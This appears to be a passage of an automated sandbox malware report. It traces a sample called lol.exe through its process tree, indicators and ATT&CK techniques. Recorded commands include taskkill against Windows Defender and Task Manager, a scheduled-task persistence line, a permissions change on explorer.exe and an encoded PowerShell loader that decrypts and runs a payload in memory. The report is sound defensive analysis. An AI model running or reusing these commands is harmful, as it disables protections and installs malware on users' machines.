3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5864	ac3.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	4072	taskkill.exe
Token: SeDebugPrivilege	1156	Rover.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	5348	scary.exe
Token: SeDebugPrivilege	5728	taskkill.exe
Token: SeDebugPrivilege	5340	taskkill.exe
Token: SeSystemtimePrivilege	772	cmd.exe
Token: SeSystemtimePrivilege	772	cmd.exe
Token: SeDebugPrivilege	2160	powershell.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5968	vbsnimmo.exe
5968	vbsnimmo.exe
5968	vbsnimmo.exe

Suspicious use of SendNotifyMessage 30 IoCs

pid	Process
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
4584	msedge.exe
836	jaffa.exe
836	jaffa.exe
836	jaffa.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
5392	whkszztakb.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
3460	ztmpxseewjrualr.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5704	shilkiszkvwxo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5752	vbsnimmo.exe
5968	vbsnimmo.exe
5968	vbsnimmo.exe
5968	vbsnimmo.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
5636	WINWORD.EXE
5636	WINWORD.EXE
5636	WINWORD.EXE
5636	WINWORD.EXE
5636	WINWORD.EXE
5636	WINWORD.EXE
5636	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3572 wrote to memory of 3772	3572	lol.exe	80
PID 3572 wrote to memory of 3772	3572	lol.exe	80
PID 3772 wrote to memory of 3684	3772	loader.exe	83
PID 3772 wrote to memory of 3684	3772	loader.exe	83
PID 3684 wrote to memory of 772	3684	cmd.exe	85
PID 3684 wrote to memory of 772	3684	cmd.exe	85
PID 772 wrote to memory of 4072	772	cmd.exe	88
PID 772 wrote to memory of 4072	772	cmd.exe	88
PID 772 wrote to memory of 1156	772	cmd.exe	90
PID 772 wrote to memory of 1156	772	cmd.exe	90
PID 772 wrote to memory of 1156	772	cmd.exe	90
PID 772 wrote to memory of 4584	772	cmd.exe	91
PID 772 wrote to memory of 4584	772	cmd.exe	91
PID 4584 wrote to memory of 1976	4584	msedge.exe	94
PID 4584 wrote to memory of 1976	4584	msedge.exe	94
PID 772 wrote to memory of 5084	772	cmd.exe	95
PID 772 wrote to memory of 5084	772	cmd.exe	95
PID 772 wrote to memory of 2896	772	cmd.exe	96
PID 772 wrote to memory of 2896	772	cmd.exe	96
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 3464	4584	msedge.exe	97
PID 4584 wrote to memory of 4496	4584	msedge.exe	98
PID 4584 wrote to memory of 4496	4584	msedge.exe	98
PID 4584 wrote to memory of 2904	4584	msedge.exe	99
PID 4584 wrote to memory of 2904	4584	msedge.exe	99
PID 4584 wrote to memory of 2904	4584	msedge.exe	99

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\lol.exe
"C:\Users\Admin\AppData\Local\Temp\lol.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3572
- C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\loader.exe
  "C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\loader.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\temp.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K main.cmd
      4⤵
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:772
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im WindowsDefender.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4072
    - - C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\Rover.exe
        
        Rover.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1156
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\web.htm
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4584
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffee3963cb8,0x7ffee3963cc8,0x7ffee3963cd8
        6⤵
        
        PID:1976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
        6⤵
        
        PID:3464
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4496
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2568 /prefetch:8
        6⤵
        
        PID:2904
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1
        6⤵
        
        PID:1132
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
        6⤵
        
        PID:4844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
        6⤵
        
        PID:1568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
        6⤵
        
        PID:2916
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
        6⤵
        
        PID:1856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
        6⤵
        
        PID:2212
      - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1388
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:2
        6⤵
        
        PID:5268
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\helper.vbs"
        5⤵
        
        PID:5084
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\spinner.gif
        5⤵
        Modifies Internet Explorer settings
        
        PID:2896
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 15
        5⤵
        Delays execution with timeout.exe
        
        PID:4652
    - - C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\scary.exe
        
        scary.exe
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:5348
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:2452
    - - C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\the.exe
        
        the.exe
        5⤵
        Executes dropped EXE
        
        PID:5472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2160
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im taskmgr
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5512
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im explorer
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5728
    - - C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\ac3.exe
        
        ac3.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:5864
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im fontdrvhost
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5340
    - - C:\Windows\system32\icacls.exe
        
        icacls c:\Windows\explorer.exe /grant Admin:(F,M)
        5⤵
        Modifies file permissions
        
        PID:6040
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 15
        5⤵
        Delays execution with timeout.exe
        
        PID:3124
    - - C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\jaffa.exe
        
        jaffa.exe
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:836
      - C:\Windows\SysWOW64\whkszztakb.exe
        
        whkszztakb.exe
        6⤵
        Modifies visibility of file extensions in Explorer
        Modifies visiblity of hidden/system files in Explorer
        Windows security bypass
        Disables RegEdit via registry modification
        Executes dropped EXE
        Windows security modification
        Enumerates connected drives
        Modifies WinLogon
        Drops file in System32 directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5392
        
        C:\Windows\SysWOW64\vbsnimmo.exe
        
        C:\Windows\system32\vbsnimmo.exe
        7⤵
        Executes dropped EXE
        Enumerates connected drives
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5968
      - C:\Windows\SysWOW64\ztmpxseewjrualr.exe
        
        ztmpxseewjrualr.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3460
      - C:\Windows\SysWOW64\vbsnimmo.exe
        
        vbsnimmo.exe
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Drops file in System32 directory
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5752
      - C:\Windows\SysWOW64\shilkiszkvwxo.exe
        
        shilkiszkvwxo.exe
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5704
      - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
        
        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""
        6⤵
        Drops file in Windows directory
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of SetWindowsHookEx
        
        PID:5636
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 15
        5⤵
        Delays execution with timeout.exe
        
        PID:5600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

